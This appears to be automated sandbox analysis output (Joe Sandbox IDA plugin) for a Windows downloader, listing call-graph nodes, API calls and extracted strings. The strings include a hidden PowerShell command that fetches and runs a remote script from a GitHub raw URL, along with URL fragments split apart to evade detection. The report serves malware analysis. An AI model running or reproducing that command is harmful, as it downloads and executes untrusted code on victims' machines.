17309 672e5e 17303->17309 17304 672b1b messages 17307 674f20 std::ios_base::_Init 42 API calls 17304->17307 17305->17309 17306->17289 17306->17304 17312 672b50 17307->17312 17308 672000 std::ios_base::_Init 42 API calls 17317 672f5f 17308->17317 17310 674b70 71 API calls 17309->17310 17311 672eb6 17309->17311 17310->17311 17311->17308 17312->17292 17313 672b8f Sleep 17312->17313 17314 672b85 messages 17312->17314 17315 6720d0 77 API calls 17313->17315 17314->17313 17318 672bbb 17315->17318 17316 672f6f 17316->16545 17317->17316 17319 674580 42 API calls 17317->17319 17320 672bc7 VirtualAlloc 17318->17320 17324 672c04 messages 17318->17324 17319->17316 17321 672be1 _Yarn 17320->17321 17320->17324 17322 672bf2 VirtualFree 17321->17322 17322->17324 17323 672db9 messages 17325 678287 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 17323->17325 17324->17296 17324->17323 17326 672dd5 17325->17326 17326->16545 17328 67829f _Yarn 17327->17328 17329 6782b9 17328->17329 17330 681851 std::_Facet_Register 2 API calls 17328->17330 17332 671240 Concurrency::cancel_current_task 17328->17332 17329->16518 17330->17328 17331 6782c5 17331->17331 17332->17331 17333 6796fd CallUnexpected RaiseException 17332->17333 17334 67125c 17333->17334 17335 67949a ___std_exception_copy 41 API calls 17334->17335 17336 671283 17335->17336 17336->16518 17338 6756db 17337->17338 17339 6755ba 17337->17339 17340 6712e0 std::ios_base::_Init 42 API calls 17338->17340 17343 67561c 17339->17343 17344 675629 17339->17344 17346 6755d0 17339->17346 17341 6756e0 17340->17341 17342 671240 Concurrency::cancel_current_task 42 API calls 17341->17342 17351 6755e0 _Yarn 17342->17351 17343->17341 17343->17346 17348 67829a std::_Facet_Register 42 API calls 17344->17348 17344->17351 17345 67829a std::_Facet_Register 42 API calls 17345->17351 17346->17345 17347 67ec03 std::ios_base::_Init 41 API calls 17349 6756ea 17347->17349 17348->17351 17350 675699 _Yarn messages 17350->16525 17351->17347 
17351->17350 17353 67634c std::ios_base::_Init 42 API calls 17352->17353 17354 6712ea 17353->17354 17355 67949a ___std_exception_copy 41 API calls 17354->17355 17356 671313 17355->17356 17356->16510 17358 67124e Concurrency::cancel_current_task 17357->17358 17359 6796fd CallUnexpected RaiseException 17358->17359 17360 67125c 17359->17360 17361 67949a ___std_exception_copy 41 API calls 17360->17361 17362 671283 17361->17362 17362->16516 17364 67eb3f ___std_exception_copy 41 API calls 17363->17364 17365 67ec12 17364->17365 17366 67ec20 __Getctype 11 API calls 17365->17366 17367 67ec1f 17366->17367 17369 67453b 17368->17369 17370 6744a4 17368->17370 17371 678287 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 17369->17371 17806 673c70 17370->17806 17373 674571 17371->17373 17373->16536 17374 67452a 17374->17369 17376 674580 42 API calls 17374->17376 17376->17369 17377 672000 std::ios_base::_Init 42 API calls 17377->17374 17379 6761c5 std::_Lockit::_Lockit 7 API calls 17378->17379 17380 674bab 17379->17380 17381 6761c5 std::_Lockit::_Lockit 7 API calls 17380->17381 17385 674bed 17380->17385 17382 674bcd 17381->17382 17386 67621d std::_Lockit::~_Lockit 2 API calls 17382->17386 17383 674c0c 17384 67621d std::_Lockit::~_Lockit 2 API calls 17383->17384 17387 674c14 17384->17387 17385->17383 17390 67829a std::_Facet_Register 42 API calls 17385->17390 17386->17385 17388 678287 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 17387->17388 17389 674c2e 17388->17389 17389->16538 17391 674c60 17390->17391 17392 6761c5 std::_Lockit::_Lockit 7 API calls 17391->17392 17393 674c8d 17392->17393 17394 674ccf 17393->17394 17395 674daa 17393->17395 17396 676616 std::_Locinfo::_Locinfo_ctor 68 API calls 17394->17396 17397 67638c codecvt 42 API calls 17395->17397 17398 674cd9 17396->17398 17399 674db4 17397->17399 17400 676661 std::_Locinfo::_Locinfo_dtor 68 API calls 17398->17400 17401 674cf3 17400->17401 17402 674d03 17401->17402 17403 67e8b9 
__freea 14 API calls 17401->17403 17404 674d1a 17402->17404 17406 67e8b9 __freea 14 API calls 17402->17406 17403->17402 17405 674d31 17404->17405 17407 67e8b9 __freea 14 API calls 17404->17407 17408 674d48 17405->17408 17409 67e8b9 __freea 14 API calls 17405->17409 17406->17404 17407->17405 17410 674d5f 17408->17410 17411 67e8b9 __freea 14 API calls 17408->17411 17409->17408 17412 674d76 17410->17412 17414 67e8b9 __freea 14 API calls 17410->17414 17411->17410 17413 67621d std::_Lockit::~_Lockit 2 API calls 17412->17413 17415 674d88 17413->17415 17414->17412 17416 6764e6 std::_Facet_Register 42 API calls 17415->17416 17416->17383 17418 672022 17417->17418 17419 67201a 17417->17419 17418->16544 17420 6796fd CallUnexpected RaiseException 17419->17420 17421 672032 std::ios_base::_Init 17419->17421 17420->17421 17810 671f10 17421->17810 17423 672068 17424 6796fd CallUnexpected RaiseException 17423->17424 17425 672077 17424->17425 17426 67949a ___std_exception_copy 41 API calls 17425->17426 17427 6720a4 17426->17427 17427->16544 17429 6745e9 17428->17429 17430 6745be 17428->17430 17429->16543 17430->17429 17431 672000 std::ios_base::_Init 42 API calls 17430->17431 17431->17429 17433 674f08 17432->17433 17439 674ddd 17432->17439 17434 6712e0 std::ios_base::_Init 42 API calls 17433->17434 17436 674e6c 17434->17436 17435 674def 17435->17238 17440 67ec03 std::ios_base::_Init 41 API calls 17436->17440 17446 674e77 17436->17446 17437 674e2c 17438 674f03 17437->17438 17442 674e66 17437->17442 17444 671240 Concurrency::cancel_current_task 42 API calls 17438->17444 17439->17435 17439->17437 17439->17438 17441 674e91 17439->17441 17443 674f12 17440->17443 17441->17446 17447 67829a std::_Facet_Register 42 API calls 17441->17447 17445 67829a std::_Facet_Register 42 API calls 17442->17445 17444->17433 17445->17436 17446->17238 17447->17446 17449 674870 17448->17449 17450 674460 42 API calls 17449->17450 17455 6748c7 17449->17455 17450->17455 17451 672000 std::ios_base::_Init 42 API 
calls 17453 674a8e 17451->17453 17452 6721e6 17456 672e00 17452->17456 17453->17452 17454 674580 42 API calls 17453->17454 17454->17452 17455->17451 17457 672e45 17456->17457 17458 674460 42 API calls 17457->17458 17460 672e5e 17457->17460 17458->17460 17459 672000 std::ios_base::_Init 42 API calls 17464 672f5f 17459->17464 17461 674b70 71 API calls 17460->17461 17462 672eb6 17460->17462 17461->17462 17462->17459 17463 6721f0 17466 674ad0 17463->17466 17464->17463 17465 674580 42 API calls 17464->17465 17465->17463 17467 674b0d 17466->17467 17491 6746f0 17467->17491 17472 674460 42 API calls 17473 674b5e 17472->17473 17473->17250 17475 675f5d 17474->17475 17487 6760ad _Yarn 17474->17487 17476 675f83 17475->17476 17477 676122 17475->17477 17475->17487 17478 675f9d 17476->17478 17481 675fde 17476->17481 17482 675feb 17476->17482 17795 676140 17477->17795 17483 67829a std::_Facet_Register 42 API calls 17478->17483 17480 676127 17484 671240 Concurrency::cancel_current_task 42 API calls 17480->17484 17481->17478 17481->17480 17485 67829a std::_Facet_Register 42 API calls 17482->17485 17489 675faf _Yarn 17482->17489 17483->17489 17484->17489 17485->17489 17486 67ec03 std::ios_base::_Init 41 API calls 17488 676131 17486->17488 17487->17258 17489->17486 17490 676086 messages 17489->17490 17490->17258 17518 6761c5 17491->17518 17494 6761c5 std::_Lockit::_Lockit 7 API calls 17495 67474e 17494->17495 17524 67621d 17495->17524 17496 6747b8 17497 67621d std::_Lockit::~_Lockit 2 API calls 17496->17497 17499 6747f8 17497->17499 17501 678287 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 17499->17501 17500 67476e 17500->17496 17531 671bc0 17500->17531 17502 674812 17501->17502 17510 675ca0 17502->17510 17505 674816 17566 671880 17505->17566 17506 6747d0 17563 6764e6 17506->17563 17511 675ce7 17510->17511 17512 674460 42 API calls 17511->17512 17513 675d00 17511->17513 17512->17513 17514 672000 std::ios_base::_Init 42 API calls 17513->17514 17516 675de5 
17514->17516 17515 674b57 17515->17472 17516->17515 17517 674580 42 API calls 17516->17517 17517->17515 17519 6761d4 17518->17519 17520 6761db 17518->17520 17572 67ecf4 17519->17572 17522 67472b 17520->17522 17577 677e91 EnterCriticalSection 17520->17577 17522->17494 17522->17500 17525 676227 17524->17525 17526 67ed02 17524->17526 17530 67623a 17525->17530 17629 677e9f LeaveCriticalSection 17525->17629 17630 67ecdd LeaveCriticalSection 17526->17630 17529 67ed09 17529->17500 17530->17500 17532 671c06 17531->17532 17533 671d5e 17531->17533 17532->17533 17534 67829a std::_Facet_Register 42 API calls 17532->17534 17533->17505 17533->17506 17535 671c16 17534->17535 17536 6761c5 std::_Lockit::_Lockit 7 API calls 17535->17536 17537 671c48 17536->17537 17538 671d77 17537->17538 17539 671c8a 17537->17539 17659 67638c 17538->17659 17631 676616 17539->17631 17550 671cd9 17551 671cf0 17550->17551 17553 67e8b9 __freea 14 API calls 17550->17553 17554 671d07 17551->17554 17555 67e8b9 __freea 14 API calls 17551->17555 17553->17551 17556 671d1e 17554->17556 17557 67e8b9 __freea 14 API calls 17554->17557 17555->17554 17558 671d35 17556->17558 17560 67e8b9 __freea 14 API calls 17556->17560 17557->17556 17559 671d4c 17558->17559 17561 67e8b9 __freea 14 API calls 17558->17561 17562 67621d std::_Lockit::~_Lockit 2 API calls 17559->17562 17560->17558 17561->17559 17562->17533 17564 67829a std::_Facet_Register 42 API calls 17563->17564 17565 6764f1 17564->17565 17565->17496 17567 67188e Concurrency::cancel_current_task 17566->17567 17568 6796fd CallUnexpected RaiseException 17567->17568 17569 67189c 17568->17569 17570 67949a ___std_exception_copy 41 API calls 17569->17570 17571 6718c3 17570->17571 17578 687156 17572->17578 17577->17522 17599 686b60 17578->17599 17598 687188 17598->17598 17600 686d49 std::_Locinfo::_Locinfo_ctor 5 API calls 17599->17600 17601 686b76 17600->17601 17602 686b7a 17601->17602 17603 686d49 std::_Locinfo::_Locinfo_ctor 5 API calls 17602->17603 17604 686b90 
                                                                                                  APIs
                                                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,EBD99D41,?,?,?,00000000,0069349B,000000FF), ref: 00672143
                                                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,?,?), ref: 006721A9
                                                                                                  • InternetOpenW.WININET(Downloader,00000001,00000000,00000000,00000000), ref: 006721C3
                                                                                                  • GetLastError.KERNEL32(?,?,?,?), ref: 006721D9
                                                                                                  • InternetOpenUrlW.WININET(00000000,?,00000000,00000000,80000000,00000000), ref: 0067228E
                                                                                                  • InternetCloseHandle.WININET(00000000), ref: 0067229F
                                                                                                  • InternetReadFile.WININET(00000000,?,00001000,?), ref: 006722EF
                                                                                                  • InternetReadFile.WININET(?,?,00001000,?), ref: 00672337
                                                                                                  • InternetCloseHandle.WININET(?), ref: 00672355
                                                                                                  • InternetCloseHandle.WININET(?), ref: 0067235D
                                                                                                  Strings
                                                                                                  • api/main/modmenu.txt, xrefs: 006726EC
                                                                                                  • Downloader, xrefs: 006721B7
                                                                                                  • htt, xrefs: 0067261C
                                                                                                  • Error, xrefs: 00672578
                                                                                                  • ps://raw.githu, xrefs: 00672650
                                                                                                  • busercontent.c, xrefs: 00672684
                                                                                                  • Failed to start process., xrefs: 0067257D
                                                                                                  • powershell -WindowStyle Hidden -Command start powershell -windowstyle h -args 'iex(iwr https://raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/cr_asm_menu.txt -usebasicparsing)', xrefs: 00672B35
                                                                                                  • om/labail300/ps, xrefs: 006726B8
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1483154930.0000000000671000.00000020.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1483129913.0000000000670000.00000002.00000001.01000000.00000003.sdmp
                                                                                                  • Associated: 00000000.00000002.1483188305.0000000000694000.00000002.00000001.01000000.00000003.sdmp
                                                                                                  • Associated: 00000000.00000002.1483214354.000000000069F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                  • Associated: 00000000.00000002.1483237199.00000000006A1000.00000002.00000001.01000000.00000003.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_670000_Lm9IJ4r9oO.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Internet$CloseHandle$ByteCharFileMultiOpenReadWide$ErrorLast
                                                                                                  • String ID: Downloader$Error$Failed to start process.$api/main/modmenu.txt$busercontent.c$htt$om/labail300/ps$powershell -WindowStyle Hidden -Command start powershell -windowstyle h -args 'iex(iwr https://raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/cr_asm_menu.txt -usebasicparsing)'$ps://raw.githu
                                                                                                  • API String ID: 1121942590-1183403302
                                                                                                  • Opcode ID: b76dc99c1e0731084948920ba5faa662f11c3c2372c322ae4a43e01291041c9f
                                                                                                  • Instruction ID: 34be2f62eea7aa8726908712f13f95885e6c108fb50fe2435e95120aacf3c1fe
                                                                                                  • Opcode Fuzzy Hash: b76dc99c1e0731084948920ba5faa662f11c3c2372c322ae4a43e01291041c9f
                                                                                                  • Instruction Fuzzy Hash: B082DE719043459FD724CF24CC98BAEB7F6EF88300F10865DF599A7291DB70AA85CB92

                                                                                                  APIs
                                                                                                    • Part of subcall function 00674F20: Concurrency::cancel_current_task.LIBCPMT ref: 00674FF6
                                                                                                  • Concurrency::cancel_current_task.LIBCPMT ref: 00672DE0
                                                                                                  Strings
                                                                                                  • api/main/modmenu.txt, xrefs: 006726EC
                                                                                                  • htt, xrefs: 0067261C
                                                                                                  • ps://raw.githu, xrefs: 00672650
                                                                                                  • busercontent.c, xrefs: 00672684
                                                                                                  • powershell -WindowStyle Hidden -Command start powershell -windowstyle h -args 'iex(iwr https://raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/cr_asm_menu.txt -usebasicparsing)', xrefs: 00672B35
                                                                                                  • om/labail300/ps, xrefs: 006726B8
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1483154930.0000000000671000.00000020.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1483129913.0000000000670000.00000002.00000001.01000000.00000003.sdmp
                                                                                                  • Associated: 00000000.00000002.1483188305.0000000000694000.00000002.00000001.01000000.00000003.sdmp
                                                                                                  • Associated: 00000000.00000002.1483214354.000000000069F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                  • Associated: 00000000.00000002.1483237199.00000000006A1000.00000002.00000001.01000000.00000003.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_670000_Lm9IJ4r9oO.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Concurrency::cancel_current_task
                                                                                                  • String ID: api/main/modmenu.txt$busercontent.c$htt$om/labail300/ps$powershell -WindowStyle Hidden -Command start powershell -windowstyle h -args 'iex(iwr https://raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/cr_asm_menu.txt -usebasicparsing)'$ps://raw.githu
                                                                                                  • API String ID: 118556049-1603240466
                                                                                                  • Opcode ID: 72558b406803670da1c83a033d031d627d30411d618619e65e0ac30b8add504e
                                                                                                  • Instruction ID: b13a4eec9dd12fee488fffaaaccbf630dd3dc460e806956386b53e5c22c4ba59
                                                                                                  • Opcode Fuzzy Hash: 72558b406803670da1c83a033d031d627d30411d618619e65e0ac30b8add504e
                                                                                                  • Instruction Fuzzy Hash: 58B138704183818BE335DF24C855BABB7E2BFD9704F108A0DE59817291EBB59588CB97
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1483154930.0000000000671000.00000020.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1483129913.0000000000670000.00000002.00000001.01000000.00000003.sdmp
                                                                                                  • Associated: 00000000.00000002.1483188305.0000000000694000.00000002.00000001.01000000.00000003.sdmp
                                                                                                  • Associated: 00000000.00000002.1483214354.000000000069F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                  • Associated: 00000000.00000002.1483237199.00000000006A1000.00000002.00000001.01000000.00000003.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_670000_Lm9IJ4r9oO.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: __floor_pentium4
                                                                                                  • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                                                                  • API String ID: 4168288129-2761157908
                                                                                                  • Opcode ID: 7a3156e817c14c79c57f169fce75b5157253796f8c9cbfa965da82264d7770fd
                                                                                                  • Instruction ID: a361e6c47d7e4742d3cda45b4e23144ba03c5e4daba8537affdcb99ec83f4bbb
                                                                                                  • Opcode Fuzzy Hash: 7a3156e817c14c79c57f169fce75b5157253796f8c9cbfa965da82264d7770fd
                                                                                                  • Instruction Fuzzy Hash: C9D23971E082298FDB64DF28DD447EAB7B6EB44305F1442EAD40DE7241EB79AE818F41

                                                                                                  APIs
                                                                                                  • GetLocaleInfoW.KERNEL32(?,2000000B,0068E30F,00000002,00000000,?,?,?,0068E30F,?,00000000), ref: 0068E096
                                                                                                  • GetLocaleInfoW.KERNEL32(?,20001004,0068E30F,00000002,00000000,?,?,?,0068E30F,?,00000000), ref: 0068E0BF
                                                                                                  • GetACP.KERNEL32(?,?,0068E30F,?,00000000), ref: 0068E0D4
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1483154930.0000000000671000.00000020.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1483129913.0000000000670000.00000002.00000001.01000000.00000003.sdmp
                                                                                                  • Associated: 00000000.00000002.1483188305.0000000000694000.00000002.00000001.01000000.00000003.sdmp
                                                                                                  • Associated: 00000000.00000002.1483214354.000000000069F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                  • Associated: 00000000.00000002.1483237199.00000000006A1000.00000002.00000001.01000000.00000003.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_670000_Lm9IJ4r9oO.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: InfoLocale
                                                                                                  • String ID: ACP$OCP
                                                                                                  • API String ID: 2299586839-711371036
                                                                                                  APIs
                                                                                                    • Part of subcall function 00685BDA: GetLastError.KERNEL32(00000000,?,0068A8E5,?,?,?,00000000,0067E87F,?,?,?), ref: 00685BDE
                                                                                                    • Part of subcall function 00685BDA: SetLastError.KERNEL32(00000000,?,?,?,00000000,?,00000006,000000FF,?,?,?,00000000,0067E87F,?,?,?), ref: 00685C80
                                                                                                  • GetUserDefaultLCID.KERNEL32(?,?,?,00000055,?), ref: 0068E2E1
                                                                                                  • IsValidCodePage.KERNEL32(00000000), ref: 0068E31F
                                                                                                  • IsValidLocale.KERNEL32(?,00000001), ref: 0068E332
                                                                                                  • GetLocaleInfoW.KERNEL32(?,00001001,-00000050,00000040,?,000000D0,00000055,00000000,?,?,00000055,00000000), ref: 0068E37A
                                                                                                  • GetLocaleInfoW.KERNEL32(?,00001002,00000030,00000040), ref: 0068E395
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1483154930.0000000000671000.00000020.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1483129913.0000000000670000.00000002.00000001.01000000.00000003.sdmp
                                                                                                  • Associated: 00000000.00000002.1483188305.0000000000694000.00000002.00000001.01000000.00000003.sdmp
                                                                                                  • Associated: 00000000.00000002.1483214354.000000000069F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                  • Associated: 00000000.00000002.1483237199.00000000006A1000.00000002.00000001.01000000.00000003.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_670000_Lm9IJ4r9oO.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Locale$ErrorInfoLastValid$CodeDefaultPageUser
                                                                                                  • String ID:
                                                                                                  • API String ID: 415426439-0
                                                                                                  APIs
                                                                                                    • Part of subcall function 00685BDA: GetLastError.KERNEL32(00000000,?,0068A8E5,?,?,?,00000000,0067E87F,?,?,?), ref: 00685BDE
                                                                                                    • Part of subcall function 00685BDA: SetLastError.KERNEL32(00000000,?,?,?,00000000,?,00000006,000000FF,?,?,?,00000000,0067E87F,?,?,?), ref: 00685C80
                                                                                                  • GetACP.KERNEL32(?,?,?,?,?,?,00682B6E,?,?,?,00000055,?,-00000050,?,?,00000004), ref: 0068D923
                                                                                                  • IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,00682B6E,?,?,?,00000055,?,-00000050,?,?), ref: 0068D95A
                                                                                                  • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,-00000050,00000000,000000D0), ref: 0068DABD
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1483154930.0000000000671000.00000020.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1483129913.0000000000670000.00000002.00000001.01000000.00000003.sdmp
                                                                                                  • Associated: 00000000.00000002.1483188305.0000000000694000.00000002.00000001.01000000.00000003.sdmp
                                                                                                  • Associated: 00000000.00000002.1483214354.000000000069F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                  • Associated: 00000000.00000002.1483237199.00000000006A1000.00000002.00000001.01000000.00000003.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_670000_Lm9IJ4r9oO.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ErrorLast$CodeInfoLocalePageValid
                                                                                                  • String ID: utf8
                                                                                                  • API String ID: 607553120-905460609
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1483154930.0000000000671000.00000020.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1483129913.0000000000670000.00000002.00000001.01000000.00000003.sdmp
                                                                                                  • Associated: 00000000.00000002.1483188305.0000000000694000.00000002.00000001.01000000.00000003.sdmp
                                                                                                  • Associated: 00000000.00000002.1483214354.000000000069F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                  • Associated: 00000000.00000002.1483237199.00000000006A1000.00000002.00000001.01000000.00000003.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_670000_Lm9IJ4r9oO.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  APIs
                                                                                                  • IsProcessorFeaturePresent.KERNEL32(00000017,?), ref: 00678E1C
                                                                                                  • IsDebuggerPresent.KERNEL32 ref: 00678EE8
                                                                                                  • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00678F01
                                                                                                  • UnhandledExceptionFilter.KERNEL32(?), ref: 00678F0B
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1483154930.0000000000671000.00000020.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1483129913.0000000000670000.00000002.00000001.01000000.00000003.sdmp
                                                                                                  • Associated: 00000000.00000002.1483188305.0000000000694000.00000002.00000001.01000000.00000003.sdmp
                                                                                                  • Associated: 00000000.00000002.1483214354.000000000069F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                  • Associated: 00000000.00000002.1483237199.00000000006A1000.00000002.00000001.01000000.00000003.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_670000_Lm9IJ4r9oO.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                                                                  • String ID:
                                                                                                  • API String ID: 254469556-0
                                                                                                  APIs
                                                                                                    • Part of subcall function 00685BDA: GetLastError.KERNEL32(00000000,?,0068A8E5,?,?,?,00000000,0067E87F,?,?,?), ref: 00685BDE
                                                                                                    • Part of subcall function 00685BDA: SetLastError.KERNEL32(00000000,?,?,?,00000000,?,00000006,000000FF,?,?,?,00000000,0067E87F,?,?,?), ref: 00685C80
                                                                                                  • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0068DCD5
                                                                                                  • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0068DD1F
                                                                                                  • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0068DDE5
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1483154930.0000000000671000.00000020.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1483129913.0000000000670000.00000002.00000001.01000000.00000003.sdmp
                                                                                                  • Associated: 00000000.00000002.1483188305.0000000000694000.00000002.00000001.01000000.00000003.sdmp
                                                                                                  • Associated: 00000000.00000002.1483214354.000000000069F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                  • Associated: 00000000.00000002.1483237199.00000000006A1000.00000002.00000001.01000000.00000003.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_670000_Lm9IJ4r9oO.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: InfoLocale$ErrorLast
                                                                                                  • String ID:
                                                                                                  • API String ID: 661929714-0
                                                                                                  APIs
                                                                                                  • IsDebuggerPresent.KERNEL32(?,?,?,?,?,?), ref: 0067EAEF
                                                                                                  • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,?), ref: 0067EAF9
                                                                                                  • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,?), ref: 0067EB06
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1483154930.0000000000671000.00000020.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1483129913.0000000000670000.00000002.00000001.01000000.00000003.sdmp
                                                                                                  • Associated: 00000000.00000002.1483188305.0000000000694000.00000002.00000001.01000000.00000003.sdmp
                                                                                                  • Associated: 00000000.00000002.1483214354.000000000069F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                  • Associated: 00000000.00000002.1483237199.00000000006A1000.00000002.00000001.01000000.00000003.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_670000_Lm9IJ4r9oO.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                                  • String ID:
                                                                                                  • API String ID: 3906539128-0
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1483154930.0000000000671000.00000020.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1483129913.0000000000670000.00000002.00000001.01000000.00000003.sdmp
                                                                                                  • Associated: 00000000.00000002.1483188305.0000000000694000.00000002.00000001.01000000.00000003.sdmp
                                                                                                  • Associated: 00000000.00000002.1483214354.000000000069F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                  • Associated: 00000000.00000002.1483237199.00000000006A1000.00000002.00000001.01000000.00000003.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_670000_Lm9IJ4r9oO.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: %$+
                                                                                                  • API String ID: 0-2626897407
                                                                                                  APIs
                                                                                                  • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000000), ref: 00686689
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1483154930.0000000000671000.00000020.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1483129913.0000000000670000.00000002.00000001.01000000.00000003.sdmp
                                                                                                  • Associated: 00000000.00000002.1483188305.0000000000694000.00000002.00000001.01000000.00000003.sdmp
                                                                                                  • Associated: 00000000.00000002.1483214354.000000000069F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                  • Associated: 00000000.00000002.1483237199.00000000006A1000.00000002.00000001.01000000.00000003.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_670000_Lm9IJ4r9oO.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ExceptionRaise
                                                                                                  • String ID:
                                                                                                  • API String ID: 3997070919-0
                                                                                                  APIs
                                                                                                  • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 006788A2
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1483154930.0000000000671000.00000020.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1483129913.0000000000670000.00000002.00000001.01000000.00000003.sdmp
                                                                                                  • Associated: 00000000.00000002.1483188305.0000000000694000.00000002.00000001.01000000.00000003.sdmp
                                                                                                  • Associated: 00000000.00000002.1483214354.000000000069F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                  • Associated: 00000000.00000002.1483237199.00000000006A1000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_670000_Lm9IJ4r9oO.jbxd
Similarity
• API ID: FeaturePresentProcessor
• String ID:
• API String ID: 2325560087-0
Similarity
• API ID:
• String ID:
• API String ID:
APIs
  • Part of subcall function 00685BDA: GetLastError.KERNEL32(00000000,?,0068A8E5,?,?,?,00000000,0067E87F,?,?,?), ref: 00685BDE
